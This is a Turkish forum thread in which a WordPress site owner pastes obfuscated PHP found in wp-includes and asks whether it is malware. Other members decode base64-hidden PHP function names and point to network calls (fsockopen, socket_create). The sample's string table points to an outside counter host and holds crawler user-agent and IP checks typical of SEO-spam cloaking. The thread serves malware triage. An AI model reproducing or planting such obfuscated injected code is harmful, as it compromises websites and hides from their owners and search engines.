• 14-11-2014, 14:59:28
    #1
    Sitemin FTP'sinde bulduğum bir dosyanın içeriği bu arkadaşlar, nedir bu? Virüs falan mı? İnternette araştırdım, decode edebileceğim bir araç bulamadım.

    <?php
    /*
     * Obfuscated PHP sample as pasted in the forum post. Only two lookup tables
     * are visible; the code that consumes them is not part of this excerpt.
     *
     * 1. $GLOBALS['_1485877630_'] is filled with the results of base64_decode()
     *    calls whose string arguments are split into short fragments joined
     *    with the `.` operator. Each entry decodes to the name of a PHP
     *    function; the reply in this thread lists all 104 of them
     *    (error_reporting, ini_set, preg_match_all, file, fopen, fsockopen,
     *    socket_create, socket_connect, md5, ...).
     *    NOTE(review): a table like this lets the rest of the file call
     *    functions through array entries, so no function name appears in clear
     *    text - presumably to defeat keyword searches; confirm against the
     *    full file.
     *
     * 2. _143113029($i) returns base64_decode($a[$i]) from a local string table.
     *    As pasted, the table is a single quoted literal with `=` padding in the
     *    middle and line breaks inside it; the separators between entries
     *    appear to have been lost in the paste (TODO confirm against the file
     *    on disk). Decoded by hand, the segments include: allow_url_fopen,
     *    countereye[.]ws (defanged here), joomla_rss.php, /c/counter.php,
     *    ?md5=, HTTP_HOST, REQUEST_URI, HTTP_USER_AGENT, Googlebot, AhrefsBot,
     *    REMOTE_ADDR, fragments of a raw "GET ... HTTP/1.1" request, and a long
     *    list of IPv4 address prefixes.
     *
     * NOTE(review): hidden function names, several alternative HTTP transports
     * (file, fopen, fsockopen, socket_create) and crawler user-agent / address
     * prefix strings are consistent with injected SEO-spam or cloaking code,
     * not with a stock WordPress file. The thread says the sample was found in
     * a file under wp-includes; compare that file with a clean copy of the same
     * WordPress release before deciding what to remove.
     */
    $GLOBALS['_1485877630_']=Array(base64_decode('' .'ZXJyb' .'3JfcmVw' .'b3J0aW5n'),base64_decode('aW5p' .'X3NldA=='),base64_decode('' .'c3' .'Ry' .'cG' .'9z'),base64_decode('ZXhwbG9kZQ=='),base64_decode('dH' .'Jpb' .'Q=='),base64_decode('Y' .'X' .'JyY' .'Xlfc2h' .'pZ' .'nQ='),base64_decode('c3Vic3Ry'),base64_decode('c3' .'Rya' .'XBfdGF' .'ncw=='),base64_decode('cHJlZ19t' .'YXRj' .'a' .'F9hbGw='),base64_decode('cHJlZ1' .'9' .'t' .'YXRjaF9hbGw' .'='),base64_decode('cHJ' .'lZ19tY' .'XRja' .'F9h' .'b' .'Gw='),base64_decode('cHJlZ19t' .'YXRja' .'F9h' .'b' .'Gw='),base64_decode('c' .'HJlZ19tYX' .'RjaF9' .'hbGw='),base64_decode('cHJl' .'Z1' .'9' .'tYXRj' .'aF9hbGw' .'='),base64_decode('' .'cHJ' .'l' .'Z' .'19tYXR' .'ja' .'F9h' .'bGw='),base64_decode('cHJlZ19tYXRjaF9hb' .'Gw='),base64_decode('c' .'HJ' .'lZ1' .'9tYXRjaF9h' .'bGw='),base64_decode('cHJ' .'lZ' .'19tYXRjaF9hbG' .'w='),base64_decode('cHJlZ1' .'9tYXRjaF9hbG' .'w='),base64_decode('' .'cH' .'JlZ1' .'9t' .'Y' .'XRjaF9hbGw='),base64_decode('c' .'HJlZ' .'19tYXR' .'j' .'a' .'F9hbGw='),base64_decode('' .'c' .'HJlZ19tYXRja' .'F9' .'hbGw='),base64_decode('cHJlZ19tYXR' .'jaF9' .'hbGw='),base64_decode('' .'cHJlZ19tYXRjaF9hbGw='),base64_decode('cH' .'J' .'lZ1' .'9tYXRjaF9' .'hbGw='),base64_decode('YXJy' .'YXl' .'fa2' .'V5c' .'w' .'=='),base64_decode('c3' .'RycG9' .'z'),base64_decode('c3RybG' .'Vu'),base64_decode('c3RycnBv' .'cw=' .'='),base64_decode('' .'c3' .'Vic3R' .'y'),base64_decode('' .'c3Ryc' .'nB' .'vcw=='),base64_decode('c3V' .'ic3' .'Ry'),base64_decode('Y2' .'91bnQ' .'='),base64_decode('d' .'HJpbQ=='),base64_decode('YX' .'JyYXlf' .'c2h' .'p' .'Z' .'nQ='),base64_decode('c3RybGVu'),base64_decode('' .'c3V' .'ic' .'3R' .'y'),base64_decode('c3RybGVu'),base64_decode('' .'c' .'3' .'Vic3Ry'),base64_decode('c3RybGVu'),base64_decode('Y29' .'1bnQ='),base64_decode('' .'c' .'3Vi' .'c' .'3Ry'),base64_decode('Z' .'nVu' .'Y3Rpb25fZX' .'hpc3Rz'),base64_decode('' .'c3RyX3JlcGxhY2U='),base64_decode('Z' .'m' .'ls' .'Z' 
.'Q=='),base64_decode('' .'Zmxvb3I='),base64_decode('YmF' .'zZ' .'V9j' .'b' .'252ZXJ0'),base64_decode('c' .'3Vic3R' .'y'),base64_decode('' .'bWQ1'),base64_decode('' .'dHJpbQ=='),base64_decode('' .'ZX' .'hwbG9kZQ=' .'='),base64_decode('Y291b' .'nQ='),base64_decode('c3Ry' .'b' .'GV' .'u'),base64_decode('' .'ZnVuY' .'3Rpb25fZXh' .'pc3Rz'),base64_decode('c3RyX3JlcGxhY2U='),base64_decode('Zm' .'xvb3I='),base64_decode('YmFzZV9jb252' .'Z' .'XJ0'),base64_decode('c3Vic3Ry'),base64_decode('bW' .'Q' .'1'),base64_decode('Z' .'m9w' .'ZW4' .'='),base64_decode('Zn' .'JlYWQ='),base64_decode('ZmlsZ' .'XNpemU' .'='),base64_decode('Z' .'mNsb3Nl'),base64_decode('Z' .'XhwbG9kZQ' .'=='),base64_decode('Y29' .'1bnQ='),base64_decode('' .'c3Ry' .'b' .'GVu'),base64_decode('' .'ZnVu' .'Y3Rpb' .'2' .'5fZXhpc3Rz'),base64_decode('c3Ry' .'X3J' .'lc' .'G' .'xhY2U' .'='),base64_decode('' .'ZnNvY2t' .'vcGV' .'u'),base64_decode('Z' .'m' .'xvb3I' .'='),base64_decode('YmFzZV9jb252ZXJ' .'0'),base64_decode('c3' .'Vic' .'3Ry'),base64_decode('bWQ' .'1'),base64_decode('Znd' .'ya' .'XRl'),base64_decode('Zm' .'VvZ' .'g=='),base64_decode('ZnJlYWQ='),base64_decode('' .'Z' .'mNsb3Nl'),base64_decode('c3Ry' .'cG9z'),base64_decode('' .'c3Vic' .'3Ry'),base64_decode('ZXh' .'wbG9k' .'ZQ' .'=' .'='),base64_decode('Y29' .'1bnQ='),base64_decode('' .'c3' .'RybG' .'V' .'u'),base64_decode('ZnVuY3' .'Rpb25' .'fZX' .'h' .'pc3' .'Rz'),base64_decode('c' .'3RyX3Jl' .'c' .'GxhY2U='),base64_decode('c' .'29ja2V' .'0' .'X' .'2NyZ' .'WF' .'0ZQ' .'=' .'='),base64_decode('c29ja2V0X2' .'Nvb' .'m5lY3Q='),base64_decode('Zmxvb3I='),base64_decode('Ym' .'FzZV9j' .'b252' .'ZXJ0'),base64_decode('c3Vic3R' .'y'),base64_decode('' .'bWQ1'),base64_decode('c29' .'j' .'a2' .'V0X3d' .'yaX' .'Rl'),base64_decode('c3RybGVu'),base64_decode('' .'c29j' .'a2V' .'0X3J' .'lYWQ='),base64_decode('c29' .'ja' .'2V0' .'X' .'2Nsb3Nl'),base64_decode('c' .'3RycG9z'),base64_decode('c' .'3Vic3R' .'y'),base64_decode('ZXhw' .'b' .'G' .'9kZQ' .'=='),base64_decode('Y2' .'9' 
.'1bnQ='),base64_decode('c' .'3Ry' .'bG' .'Vu'),base64_decode('' .'ZXhwbG' .'9kZ' .'Q=='),base64_decode('' .'aW' .'5fYXJ' .'y' .'Y' .'X' .'k' .'='),base64_decode('c3RycG' .'9z'),base64_decode('' .'c3R' .'ydG9s' .'b3' .'dlcg=='),base64_decode('' .'c3RydG9s' .'b3dl' .'cg' .'==')); ?><?php function _143113029($i){$a=Array('YWxsb3dfdXJsX2ZvcGVuY291bnRlcmV5ZS53cw==MTA=bGlua3M=cGFnZWltcGFnZWltOQ==UEhQX1NFTEY=am9vbWxhX3Jzcy5waHA=PCEtLSBjb3VudGVkIGluIA==PCEtLSBXcm9uZyBwYXJhbWV0ZXIhIC0tPg==PCEtLSBNaXNzZWQgcGFyYW1ldGVyISAtLT4=Cg==PGJvZHk=L1thLXpdezIsfSsgYW5kIC8=L1thLXpdezIsfSsgdGhlIC8=L1thLXpdezIsfSsgb2YgLw==L1thLXpdezIsfSsgdG8gLw==L1thLXpdezIsfSsgb24gLw==L1thLXpdezIsfSsgaXMgLw==L1thLXpdezIsfSsgZGUgLw==L1thLXpdezIsfSsgZW4gLw==L1thLXpdezIsfSsgdW5kIC8=L1thLXpdezIsfSsgYXVmIC8=L1thLXpdezIsfSsgeSAvL1thLXpdezIsfSsgZSAvL1thLXpdezIsfSsgZXQgLw==L1thLXpdezIsfSsgbGEgLw==L1thLXpdezIsfSsgZGVzIC8=L1thLXpdezIsfSsgZGVyIC8=L1thLXpdezIsfSsgZGllIC8=MA==Pg==PA==IA==ZmlsZQ==d3d3Lg==SFRUUF9IT1NUaHR0cDovLw==L2MvY291bnRlci5waHA=P21kNT0=UkVRVUVTVF9VUkk=JnY9Cg==fHx8Zm9wZW4=d3d3Lg==SFRUUF9IT1NUaHR0cDovLw==L2MvY291bnRlci5waHA=P21kNT0=UkVRVUVTVF9VUkk=JnY9cg==fHx8ZnNvY2tvcGVud3d3Lg==SFRUUF9IT1NUR0VUIC9jL2NvdW50ZXIucGhwP21kNT0=UkVRVUVTVF9VUkk=JnY9IEhUVFAvMS4xDQo=SG9zdDogDQo=Q29ubmVjdGlvbjogQ2xvc2UNCg0KDQoNCg==fHx8c29ja2V0X2NyZWF0ZQ==d3d3Lg==SFRUUF9IT1NUR0VUIC9jL2NvdW50ZXIucGhwP21kNT0=UkVRVUVTVF9VUkk=JnY9IEhUVFAvMS4xDQo=SG9zdDogDQo=Q29ubmVjdGlvbjogQ2xvc2UNCg0KDQoNCg==fHx8MS4wLg==MS4xLg==MS4yLg==MTAzLjI0Ni4=MTA4LjE2Ny4=MTA4LjE3MC4=MTA4LjE3Ny4=MTA4LjU5Lg==MTA5LjEwOS4=MTEzLjE5Ny4=MTI0LjMwLg==MTQyLjI1MC4=MTQyLjI1MS4=MTU3LjIzOC4=MTY1LjE5My4=MTY2LjkwLg==MTcyLjIxNy4=MTcyLjI1My4=MTczLjE1Lg==MTczLjE2NC4=MTczLjE5NC4=MTczLjIwMC4=MTczLjIwMy4=MTczLjI0MC4=MTczLjI1NS4=MTc0LjE0Mi4=MTc4LjMzLg==MTc4LjYwLg==MTg0LjEwNy4=MTg0LjE3My4=MTg1LjI1Lg==MTkyLjExOS4=MTkyLjE1OC4=MTkyLjE3OC4=MTkyLjE3OS4=MTkyLjIwMC4=MTkzLjEyMC4=MTkzLjE0Mi4=MTkzLjE4Ni4=MTkzLjIwMC4=MTkzLjkyLg==MTk0LjEwMC4=MTk0LjExMC4=MTk0LjIyMS4=MTk0Ljc4Lg==MTk1LjEwMC4=MTk1Lj
E0MS4=MTk1LjE0NS4=MTk1LjE4Lg==MTk1LjIwNS4=MTk1LjIyLg==MTk1LjIyOS4=MTk1LjI3Lg==MTk1LjU5Lg==MTk1LjY1Lg==MTk1Ljc2Lg==MTk1LjgxLg==MTk2LjMuMTk4LjEwOC4=MTk5LjEwMi4=MTk5LjE5Mi4=MTk5LjIyMy4=MTk5LjIyNy4=MjAwLjIwMi4=MjAwLjk5Lg==MjAyLjEwNi4=MjAyLjk2Lg==MjAzLjIwOC4=MjAzLjIyMi4=MjAzLjk4Lg==MjA0LjE3Lg==MjA0LjUwLg==MjA1LjE5Ny4=MjA2LjE1Lg==MjA2LjE2MC4=MjA2LjE2OS4=MjA2LjE4Ni4=MjA2LjgwLg==MjA3LjIyMy4=MjA3LjI1MC4=MjA3LjQ3Lg==MjA3Ljg2Lg==MjA3Ljg4Lg==MjA4LjExMy4=MjA4LjE4NS4=MjA4LjIxLg==MjA4LjI1My4=MjA4LjM2Lg==MjA4LjM3Lg==MjA4LjQ0Lg==MjA4LjQ1Lg==MjA5LjExNi4=MjA5LjExOC4=MjA5LjExOS4=MjA5LjEyLg==MjA5LjE4NS4=MjA5LjIwMy4=MjA5LjIyMC4=MjA5LjIzNC4=MjA5LjI0NS4=MjA5LjI0Ny4=MjA5LjI0OS4=MjA5LjQ4Lg==MjA5Ljg1Lg==MjEyLjAuMjEyLjEwOC4=MjEyLjEyNi4=MjEyLjE3OS4=MjEyLjE4MS4=MjEyLjIxLg==MjEyLjQ5Lg==MjEyLjUwLg==MjEzLjE0NC4=MjEzLjE1MS4=MjEzLjE1Mi4=MjEzLjE4Ni4=MjEzLjE4Ny4=MjEzLjE5Lg==MjEzLjI0MC4=MjEzLjI0Ni4=MjEzLjMxLg==MjEzLjYxLg==MjE2LjEuMjE2LjEwOS4=MjE2LjExMC4=MjE2LjEzNi4=MjE2LjE1Ni4=MjE2LjIwNy4=MjE2LjIxLg==MjE2LjIxOC4=MjE2LjIzOS4=MjE2LjMzLg==MjE2LjM0Lg==MjE2LjU4Lg==MjE2LjU5Lg==MjE2LjY0Lg==MjE2Ljc0Lg==MjE3LjExOC4=MjE3LjE0OS4=MjE3LjE2My4=MjE3LjE5My4=MjE3LjI4Lg==MjE3LjMwLg==MjE3LjMzLg==MjIyLjY2Lg==MzguMTAxLg==MzguMTAyLg==MzguMTA0Lg==MzguMTA2Lg==MzguMTA3Lg==MzguOTguNC4zLg==NDYuNC4=NTAuMTE2Lg==NjIuMTU5Lg==NjIuMjAuNjIuMjMzLg==NjMuMTQ2Lg==NjMuMTYxLg==NjMuMTY2Lg==NjMuMjExLg==NjMuMjQzLg==NjMuMjUxLg==NjMuODMuNjMuODQuNjMuOTcuNjQuMC4=NjQuMTI0Lg==NjQuMTI4Lg==NjQuMTMyLg==NjQuMTU0Lg==NjQuMTg2Lg==NjQuMjMzLg==NjQuMjQ1Lg==NjQuNDEuNjQuNjguNjQuNzEuNjQuOS4=NjUuMTY3Lg==NjUuMTcwLg==NjUuMTcxLg==NjUuMTk2Lg==NjUuMjAxLg==NjUuMjA1Lg==NjUuMjEwLg==NjUuMjExLg==NjUuMjE0Lg==NjUuMjIxLg==NjUuMjIzLg==NjUuMjQ1Lg==NjUuNDcuNjYuMTAyLg==NjYuMTYyLg==NjYuMTkyLg==NjYuMjI3Lg==NjYuMjQ5Lg==NjYuNzcuNjcuMTIyLg==NjcuMTI2Lg==NjcuMTUyLg==NjcuNjkuNjcuOTMuNjkuMTExLg==NjkuMjI0Lg==NjkuMjI4Lg==NjkuMjM2Lg==NjkuMjM3Lg==NzAuMjM5Lg==NzAuMzIuNzAuODkuNzAuOTAuNzEuMTMwLg==NzIuMTQuNzIuMTYuNzQuMTI1Lg==NzUuMTcuNzUuMjMuNzUuMzcuNzUuNTIuNzYuMjAwLg==NzYuMjIwLg==NzYuMjMxLg==NzYuMj
QyLg==NzYuMjQ2Lg==NzcuMTA5Lg==NzcuNDAuNzguOC4=OC4yMi4=OC4zNC4=OC4zNS4=OC42Lg==OC44Lg==ODAuMTQ2Lg==ODAuMTY5Lg==ODAuMjI3Lg==ODAuMjMxLg==ODAuMjM5Lg==ODAuNzcuODAuODAuODEuMjExLg==ODEuOTMuODIuOTQuODMuMTQxLg==ODMuMjIwLg==ODQuMjMzLg==ODQuMjM1Lg==ODYuMTI3Lg==ODcuMjQ0Lg==ODguMjA4Lg==ODkuMTE0Lg==ODkuMTc1Lg==ODkuMjA3Lg==ODkuOTYuOTIuNDUuOTMuMTUzLg==OTMuOTQuOTQuMjAwLg==OTQuNDAuOTUuMTcyLg==OTYuMTI1Lg==OTkuMTM2Lg==OTkuMTQ0Lg==OTkuMTQ4Lg==OTkuMTYzLg==OTkuNDAuOTkuNTUuOTkuOTYuSFRUUF9VU0VSX0FHRU5UR29vZ2xlYm90SFRUUF9VU0VSX0FHRU5UR29vZ2xlSFRUUF9VU0VSX0FHRU5UZ29vZ2xlSFRUUF9VU0VSX0FHRU5UQWhyZWZzQm90Lg==UkVNT1RFX0FERFI=Lg==Lg==');return base64_decode($a[$i]);} ?>
  • 14-11-2014, 15:44:47
    #2
    array'ın içindekiler

    Array
    (
        [0] => error_reporting
        [1] => ini_set
        [2] => strpos
        [3] => explode
        [4] => trim
        [5] => array_shift
        [6] => substr
        [7] => strip_tags
        [8] => preg_match_all
        [9] => preg_match_all
        [10] => preg_match_all
        [11] => preg_match_all
        [12] => preg_match_all
        [13] => preg_match_all
        [14] => preg_match_all
        [15] => preg_match_all
        [16] => preg_match_all
        [17] => preg_match_all
        [18] => preg_match_all
        [19] => preg_match_all
        [20] => preg_match_all
        [21] => preg_match_all
        [22] => preg_match_all
        [23] => preg_match_all
        [24] => preg_match_all
        [25] => array_keys
        [26] => strpos
        [27] => strlen
        [28] => strrpos
        [29] => substr
        [30] => strrpos
        [31] => substr
        [32] => count
        [33] => trim
        [34] => array_shift
        [35] => strlen
        [36] => substr
        [37] => strlen
        [38] => substr
        [39] => strlen
        [40] => count
        [41] => substr
        [42] => function_exists
        [43] => str_replace
        [44] => file
        [45] => floor
        [46] => base_convert
        [47] => substr
        [48] => md5
        [49] => trim
        [50] => explode
        [51] => count
        [52] => strlen
        [53] => function_exists
        [54] => str_replace
        [55] => floor
        [56] => base_convert
        [57] => substr
        [58] => md5
        [59] => fopen
        [60] => fread
        [61] => filesize
        [62] => fclose
        [63] => explode
        [64] => count
        [65] => strlen
        [66] => function_exists
        [67] => str_replace
        [68] => fsockopen
        [69] => floor
        [70] => base_convert
        [71] => substr
        [72] => md5
        [73] => fwrite
        [74] => feof
        [75] => fread
        [76] => fclose
        [77] => strpos
        [78] => substr
        [79] => explode
        [80] => count
        [81] => strlen
        [82] => function_exists
        [83] => str_replace
        [84] => socket_create
        [85] => socket_connect
        [86] => floor
        [87] => base_convert
        [88] => substr
        [89] => md5
        [90] => socket_write
        [91] => strlen
        [92] => socket_read
        [93] => socket_close
        [94] => strpos
        [95] => substr
        [96] => explode
        [97] => count
        [98] => strlen
        [99] => explode
        [100] => in_array
        [101] => strpos
        [102] => strtolower
        [103] => strtolower
    )
    Decode edilince PHP fonksiyon adları görülüyor.
  • 14-11-2014, 15:47:52
    #3
    Eygun adlı üyeden alıntı: mesajı görüntüle
    array'ın içindekiler

    php komutları görülüyor
    Zararlı mı bu dosya hocam ? wordpress kurulu sitemde wp-includes klasörü içerisindeki bir dosyada buldum bu kodları
  • 14-11-2014, 16:14:09
    #4
    EgeBey adlı üyeden alıntı: mesajı görüntüle
    Zararlı mı bu dosya hocam ? wordpress kurulu sitemde wp-includes klasörü içerisindeki bir dosyada buldum bu kodları
    Muhtemelen lisanssız ya da güvenilir olmayan bir yapımcının sitesinden indirdiğiniz tema / eklenti yüzünden shell yemiş gibi duruyorsunuz.

    O dosya tek başına değildir muhtemelen sisteminizde.
    Kodlar zararlı mı ?
    - Yeterince işlem yapılır o listedeki fonksiyonlarla. Site çökertilir, başka dosyalar kopyalanır, klonlanır, silinir, düzeltilir....
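    Ne için kullanıldığına bağlı; fonksiyonların kendisi standart PHP fonksiyonları. Ancak adlarının base64 ile parçalanıp gizlenmesi ve listede fsockopen, socket_create gibi ağ bağlantısı fonksiyonlarının bulunması, bu dosyanın büyük olasılıkla zararlı olduğuna işaret ediyor.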